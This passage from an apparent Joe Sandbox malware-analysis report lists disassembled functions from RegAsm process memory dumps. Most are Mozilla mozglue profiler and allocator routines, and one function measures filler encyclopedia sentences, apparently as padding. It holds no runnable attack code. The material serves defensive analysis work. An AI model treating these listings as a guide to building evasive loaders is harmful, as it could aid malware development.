                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F70E
                                                                                                                                                                                                                                                    • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C71F8F9
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E6390: GetCurrentThreadId.KERNEL32 ref: 6C6E63D0
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6E63DF
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6E640E
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F93A
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F98A
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F990
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F994
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F716
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C6DB5E0
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F739
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F746
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F793
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C75385B,00000002,?,?,?,?,?), ref: 6C71F829
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,00000000,?), ref: 6C71F84C
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C71F866
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C71FA0C
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C71F968), ref: 6C6E5E8C
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E5E9D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: GetCurrentThreadId.KERNEL32 ref: 6C6E5EAB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: GetCurrentThreadId.KERNEL32 ref: 6C6E5EB8
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E5ECF
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C6E5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C6E5F47
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: GetCurrentProcess.KERNEL32 ref: 6C6E5F53
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: GetCurrentThread.KERNEL32 ref: 6C6E5F5C
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: GetCurrentProcess.KERNEL32 ref: 6C6E5F66
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C6E5F7E
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C71F9C5
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C71F9DA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_register_thread(%s), xrefs: 6C71F71F
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C71F9A6
                                                                                                                                                                                                                                                    • " attempted to re-register as ", xrefs: 6C71F858
                                                                                                                                                                                                                                                    • Thread , xrefs: 6C71F789
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                                                                                                                    • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                                                                                                                    • API String ID: 882766088-1834255612
                                                                                                                                                                                                                                                    • Opcode ID: 229a1a48eba098f9c5a3340d285666a564778dff51cb11aa02c09aa5c4b5c0cd
                                                                                                                                                                                                                                                    • Instruction ID: b18a07cf0a33956cf00611a9b0ce72f3e54bcec32f2d6b20da14c1162074d79b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 229a1a48eba098f9c5a3340d285666a564778dff51cb11aa02c09aa5c4b5c0cd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A58128716083009FD700DF24C944BAABBB5FFC5308F89452DE85597B51EB30E949CBA6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EE60
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EE6D
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EE92
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C71EEA5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C71EEB4
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C71EEBB
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EEC7
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71EECF
                                                                                                                                                                                                                                                      • Part of subcall function 6C71DE60: GetCurrentThreadId.KERNEL32 ref: 6C71DE73
                                                                                                                                                                                                                                                      • Part of subcall function 6C71DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C74FEF3,?,?,?,?,?,?,00000000), ref: 6C71DE7B
                                                                                                                                                                                                                                                      • Part of subcall function 6C71DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000), ref: 6C71DEB8
                                                                                                                                                                                                                                                      • Part of subcall function 6C71DE60: free.MOZGLUE(00000000), ref: 6C71DEFE
                                                                                                                                                                                                                                                      • Part of subcall function 6C71DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C71DF38
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EF1E
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EF2B
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EF59
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EFB0
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EFBD
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EFE1
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EFF8
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F000
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C71F02F
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C71F09B
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C71F0AC
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C71F0BE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_pause, xrefs: 6C71F008
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_stop, xrefs: 6C71EED7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                                                                                                                    • API String ID: 16519850-1833026159
                                                                                                                                                                                                                                                    • Opcode ID: 7e6943bf13dd5e5c94f8a2a54fc80c4749b44e470e8bdfc1f8d10e13de1e2ded
                                                                                                                                                                                                                                                    • Instruction ID: 8bc8a8edd98e0ea87bf4c6890ae376ca36b6d0baaedabcdc5b08bb707ca03d20
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e6943bf13dd5e5c94f8a2a54fc80c4749b44e470e8bdfc1f8d10e13de1e2ded
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D65107357082149FEB406BA4D50C7B677B8EB46318F98053AED2583F80DF716949C7A2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C70D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75E804), ref: 6C70D047
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C70D093
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C70D0A6
                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C75E810,00000040), ref: 6C70D0D0
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C75E7B8,00001388), ref: 6C70D147
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C75E744,00001388), ref: 6C70D162
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C75E784,00001388), ref: 6C70D18D
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C75E7DC,00001388), ref: 6C70D1B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                                                                                                                                                                                    • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                                                                                                                                                                                    • API String ID: 2957312145-326518326
                                                                                                                                                                                                                                                    • Opcode ID: 742d92352639e210bda072aaf0a7cf1ccac18de0dead75dcb28129e8b4fa746d
                                                                                                                                                                                                                                                    • Instruction ID: e5c4b005ea908f92b24985169f55ce5891bfd00b6625307a1c4c4ca067b65fb4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 742d92352639e210bda072aaf0a7cf1ccac18de0dead75dcb28129e8b4fa746d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A781E2B0B043089FEB008F79CA54B6937F5EB26308F944939E90197B80DF79A805CBD5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E7FD0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C6E8007
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C6E801D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C6E802B
                                                                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C6E803D
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C6E808D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: mozalloc_abort.MOZGLUE(?), ref: 6C6ECAA2
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C6E809B
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C6E80B9
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6E80DF
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E80ED
                                                                                                                                                                                                                                                    • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E80FB
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E810D
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6E8133
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C6E8149
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C6E8167
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C6E817C
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E8199
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                                                                                                                                                                                    • String ID: 0>ql
                                                                                                                                                                                                                                                    • API String ID: 2721933968-2377812707
                                                                                                                                                                                                                                                    • Opcode ID: 77d31d1058371c05c9cbc9f8f0bddc2ae182e102349188e48c5089347d93bd09
                                                                                                                                                                                                                                                    • Instruction ID: 179ff079b9f5e100986d335c232f20b414dd6d01d41d04762ada70dfdd38dfe7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77d31d1058371c05c9cbc9f8f0bddc2ae182e102349188e48c5089347d93bd09
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51A4B2E052145BDB00DBA9DC849EFBBB9AF4D324F144126E815E7750E730DD058BA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00402290 Relevance: 27.1, APIs: 10, Strings: 8, Instructions: 61stringmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,0000000F,004180DB), ref: 004022A2
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Browns Lake derives its name from Henry Brown, a pioneer settler.,?,?,?,0000000F,004180DB), ref: 004022CA
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Tiffany Alexandra Brymer (born January 21, 1981) is an American former tennis player.,?,?,?,0000000F,004180DB), ref: 004022D1
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Andrea Robin Wood (born March 2, 1973) is an American attorney serving as a United States district judge of the United States District Court for the Northern District of Illinois.,?,?,?,0000000F,004180DB), ref: 004022D8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Richard Marston (1847?1917) was an English scenic designer who had a prominent career as a designer for Broadway productions from the 1860s into the early 20th century.,?,?,?,0000000F,004180DB), ref: 004022DF
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,0000000F,004180DB), ref: 004022E7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Cristina Garmendia y Mendiz?bal (born 1962 in San Sebasti?n) is a Spanish biologist and businesswoman.,?,?,?,0000000F,004180DB), ref: 00402304
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Kosse is a town in southern Limestone County, Texas, United States. The population was 464 at the 2010 census,?,?,?,0000000F,004180DB), ref: 0040230B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(The 2017 Argentina Open was a men's tennis tournament played on outdoor clay courts.,?,?,?,0000000F,004180DB), ref: 0040231B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Vigia is a municipality in the northeastern part of the state of Par?, Brazil. The town was founded on 16 January 1616.,?,?,?,0000000F,004180DB), ref: 00402322
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Richard Marston (1847?1917) was an English scenic designer who had a prominent career as a designer for Broadway productions from the 1860s into the early 20th century., xrefs: 004022DA
                                                                                                                                                                                                                                                    • Vigia is a municipality in the northeastern part of the state of Par?, Brazil. The town was founded on 16 January 1616., xrefs: 0040231D
                                                                                                                                                                                                                                                    • Andrea Robin Wood (born March 2, 1973) is an American attorney serving as a United States district judge of the United States District Court for the Northern District of Illinois., xrefs: 004022D3
                                                                                                                                                                                                                                                    • Browns Lake derives its name from Henry Brown, a pioneer settler., xrefs: 004022C5
                                                                                                                                                                                                                                                    • The 2017 Argentina Open was a men's tennis tournament played on outdoor clay courts., xrefs: 00402316
                                                                                                                                                                                                                                                    • Cristina Garmendia y Mendiz?bal (born 1962 in San Sebasti?n) is a Spanish biologist and businesswoman., xrefs: 004022F4
                                                                                                                                                                                                                                                    • Tiffany Alexandra Brymer (born January 21, 1981) is an American former tennis player., xrefs: 004022CC
                                                                                                                                                                                                                                                    • Kosse is a town in southern Limestone County, Texas, United States. The population was 464 at the 2010 census, xrefs: 00402306
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$AllocLocal
                                                                                                                                                                                                                                                    • String ID: Andrea Robin Wood (born March 2, 1973) is an American attorney serving as a United States district judge of the United States District Court for the Northern District of Illinois.$Browns Lake derives its name from Henry Brown, a pioneer settler.$Cristina Garmendia y Mendiz?bal (born 1962 in San Sebasti?n) is a Spanish biologist and businesswoman.$Kosse is a town in southern Limestone County, Texas, United States. The population was 464 at the 2010 census$Richard Marston (1847?1917) was an English scenic designer who had a prominent career as a designer for Broadway productions from the 1860s into the early 20th century.$The 2017 Argentina Open was a men's tennis tournament played on outdoor clay courts.$Tiffany Alexandra Brymer (born January 21, 1981) is an American former tennis player.$Vigia is a municipality in the northeastern part of the state of Par?, Brazil. The town was founded on 16 January 1616.
                                                                                                                                                                                                                                                    • API String ID: 2140729754-378077645
                                                                                                                                                                                                                                                    • Opcode ID: 42e72adc4881b71184d18a11a47a02970469dcb5bfba6d8990231ebefcaf9384
                                                                                                                                                                                                                                                    • Instruction ID: bf95165bdb397525c93dee6e2d35537563dbebe651dc6957e7e88cb653c82af4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42e72adc4881b71184d18a11a47a02970469dcb5bfba6d8990231ebefcaf9384
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3110A31B00278ABC710DFADAC81A6E7FE5EF89710B514097E904D3240C5B49C018BF5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C6D3217
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C6D3236
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: FreeLibrary.KERNEL32 ref: 6C6D324B
